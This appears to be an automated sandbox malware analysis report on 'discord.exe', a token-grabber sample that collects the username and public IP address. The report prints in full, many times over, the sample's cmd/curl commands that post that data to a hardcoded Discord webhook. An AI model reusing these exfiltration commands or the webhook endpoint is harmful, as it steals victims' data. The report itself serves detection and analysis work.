Windows Analysis Report
discord.exe

Overview

General Information

Sample Name: discord.exe
Analysis ID: 575228
MD5: 0119d6972125a7955e886c8f127c07d0
SHA1: 6c3ea968a773e4019e8e3d097c1b4c6419a26fa0
SHA256: 91d204953e7765aab2777ebdddc20cb4057624dfc2cd8e0fa524626a7953cb65
Tags: 64DiscordDiscordStealerexeStealerWin64
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Sigma detected: Suspicious Curl File Upload
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found large amount of non-executed APIs
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: discord.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: discord.exe Virustotal: Detection: 52% Perma Link
Source: discord.exe Metadefender: Detection: 29% Perma Link
Source: discord.exe ReversingLabs: Detection: 64%
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: discord.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\Andrew\Desktop\tokengrabber\x64\Release\c++ tokengrabber.pdb source: discord.exe
Source: Binary string: C:\Users\Andrew\Desktop\tokengrabber\x64\Release\c++ tokengrabber.pdb(( source: discord.exe
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED43118C FindClose,terminate,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_00007FF6ED43118C
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.128.64.141 23.128.64.141
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: discord.exe, 00000000.00000002.690845837.0000017E1ABB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: curl.exe, 00000008.00000002.689618766.000001D924C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuR
Source: curl.exe, 00000008.00000002.689618766.000001D924C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg
Source: curl.exe, 00000008.00000002.689640955.000001D924C4F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.689253787.000001D924C4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpgMONET
Source: curl.exe, 00000004.00000002.682520191.00000141970E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.689618766.000001D924C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpghttps://discordapp.com/api/we
Source: discord.exe, 00000000.00000002.690591140.00000027802F7000.00000004.00000010.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690765568.0000017E1AB7B000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org
Source: discord.exe, 00000000.00000002.690902486.0000017E1ABE6000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690765568.0000017E1AB7B000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690717552.0000017E1AB41000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org/
Source: discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org/.o
Source: discord.exe, 00000000.00000002.690902486.0000017E1ABE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org/:5
Source: discord.exe, 00000000.00000002.690591140.00000027802F7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.orgc
Source: unknown DNS traffic detected: queries for: discordapp.com
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED425C6A InternetOpenUrlA,InternetReadFile,InternetCloseHandle, 0_2_00007FF6ED425C6A
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: IP retrieverHost: ip4.seeip.orgCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49772 version: TLS 1.2
Detected potential crypto function
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED42E2C0 0_2_00007FF6ED42E2C0
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED42C960 0_2_00007FF6ED42C960
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED42ADE0 0_2_00007FF6ED42ADE0
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED4247AC 0_2_00007FF6ED4247AC
Source: discord.exe Virustotal: Detection: 52%
Source: discord.exe Metadefender: Detection: 29%
Source: discord.exe ReversingLabs: Detection: 64%
Source: discord.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\discord.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\discord.exe "C:\Users\user\Desktop\discord.exe"
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Users\user\Desktop\discord.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_01
Source: C:\Users\user\Desktop\discord.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\OFTXDLKO.txt Jump to behavior
Source: classification engine Classification label: mal56.winEXE@10/4@3/3
Source: C:\Users\user\Desktop\discord.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\discord.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: discord.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: discord.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Andrew\Desktop\tokengrabber\x64\Release\c++ tokengrabber.pdb source: discord.exe
Source: Binary string: C:\Users\Andrew\Desktop\tokengrabber\x64\Release\c++ tokengrabber.pdb(( source: discord.exe
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\discord.exe API coverage: 4.7 %
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED43118C FindClose,terminate,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_00007FF6ED43118C
Source: curl.exe, 00000008.00000003.689418956.000001D924C40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: discord.exe, 00000000.00000002.690818333.0000017E1AB9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000004.00000002.682532661.00000141970F2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.682298316.00000141970EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431E48 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6ED431E48
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED4316E8 SetUnhandledExceptionFilter,_set_new_mode, 0_2_00007FF6ED4316E8
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431E48 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6ED431E48
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431B64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF6ED431B64
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431FF0 SetUnhandledExceptionFilter, 0_2_00007FF6ED431FF0
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx Jump to behavior
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431D28 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6ED431D28
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED425300 GetUserNameA, 0_2_00007FF6ED425300
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 575228 Sample: discord.exe Startdate: 20/02/2022 Architecture: WINDOWS Score: 56 27 Antivirus / Scanner detection for submitted sample 2->27 29 Multi AV Scanner detection for submitted file 2->29 7 discord.exe 14 2->7         started        process3 dnsIp4 25 ip4.seeip.org 23.128.64.141, 443, 49771 JOESDATACENTERUS United States 7->25 10 cmd.exe 1 7->10         started        12 cmd.exe 1 7->12         started        14 conhost.exe 7->14         started        process5 process6 16 curl.exe 1 10->16         started        19 curl.exe 1 12->19         started        dnsIp7 21 discordapp.com 162.159.133.233, 443, 49770 CLOUDFLARENETUS United States 16->21 23 162.159.135.233, 443, 49772 CLOUDFLARENETUS United States 19->23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.128.64.141
 ip4.seeip.org United States
19969 JOESDATACENTERUS false
162.159.135.233
 unknown United States
13335 CLOUDFLARENETUS false
162.159.133.233
 discordapp.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
discordapp.com 162.159.133.233 true
ip4.seeip.org 23.128.64.141 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ip4.seeip.org/ false
  • URL Reputation: safe
 unknown